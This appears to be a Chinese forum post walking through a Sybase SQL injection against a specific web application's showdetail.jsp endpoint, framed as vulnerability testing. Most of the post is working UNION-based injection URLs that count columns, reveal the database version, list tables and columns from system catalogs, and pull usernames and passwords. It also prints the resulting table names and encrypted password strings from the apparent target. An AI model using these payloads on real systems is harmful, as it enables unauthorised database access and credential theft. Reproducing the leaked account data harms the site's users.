最近做漏洞测试和上报时候遇到了一个非主流的SQL注入点,Sybase SQL注入。
鉴于习科论坛没有此类案例,而翻了一些中文站点,也没有比较好的Sybase SQL的注入文章,于是就发出来了。
确认注入点后,在Sybase SQL注入点一般注入步骤中,我们用order by来查看页面中SQL语句表所含的字段数为26
##正确页面 .jsp?axh=2893+order+by+26 ###错误页面 .jsp?axh=2893+order+by+27
下一步使用union联合查询时,需要注意字段间的类型,此处需要参见MSSQL注入或者PostGreSQL的注入。
order by 26得到的26个字段中,可能含有整数、文本、日期等多种类型格式的字段,需要一一对应,这一点可以参见本PostgreSQL注入问题总结
得到注入语句:
showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,'c',@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'
第d号显示位上面的参数@@version
是查看SyBase数据库的版本:
Adaptive Server Enterprise/12.5.4/EBF 13387/P/NT (IX86)/OS 4.0/ase1254/2006/32-bit/OPT/Sat May 20 00:54:28 2006
下一步看数据库中有什么表
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+sysobjects+where+type='U' select name from sysobjects where type='U'
查看第一个表的时候是这个语句。Sybase不像MySQL可以使用group_concat()函数一次性列出所有表。
第一个表的名称为:meetingpub,在where后面加入判断条件,即name不等于meetingpub
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+sysobjects+where+type='U'+and+name+!='meetingpub'
得到第二个表的名称为:CASES_CCXS,继续加入name不等于的判断条件。依次类推就得到:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,name,@@version,'e',null,null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+sysobjects+where+type='U'+and+name+!='meetingpub'+and+name+!='CASES_CCXS'+and+name+!='S_ZXRS'+and+name+!='GF_TO_EASTSOFT'+and+name+!='S_AJLBJDDY'+and+name+!='CASES2'+and+name+!='SSFYJ'
然后看USER表中都有哪些字段
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,min(name),'','e','',null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+syscolumns+where+id=(select+id+from+sysobjects+where+type='U'+and+name='USER') select min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='USER')
第二个及后面的字段,依照表段的方式类推。在where后面加name不等于的判断条件
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,min(name),'','e','',null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x','y','z'+from+syscolumns+where+id=(select+id+from+sysobjects+where+type='U'+and+name='WSLA_USER')and+name!='EMAIL'and+name!='TELEPHONE'and+name!='TYPE'and+name!='USERID'and+name!='USERNAME'+--+
最后得到账户的表段、字段名称以后,读取数据:
/showdetail.jsp?axh=2893+and+1=2+union+all+select+1,2,USERNAME,PASSWORD,USERID,'',null,'h','i','j','k','l','m',14,'o','p','q','r','s','t','u','v','w','x',TYPE,'z'+from+USER+where+USERNAME='19990909'
加密过的PASSWORD数据
9C995A7E5P97955P5279
54775E7A727P7P775A7P
9EE37ASES1S9EPE32996
47S8S4S249S845S24561
另外:如果表和字段数量多的话,其实还有别的办法
原文作者补充,可用'pass'等直接匹配用户数据所在表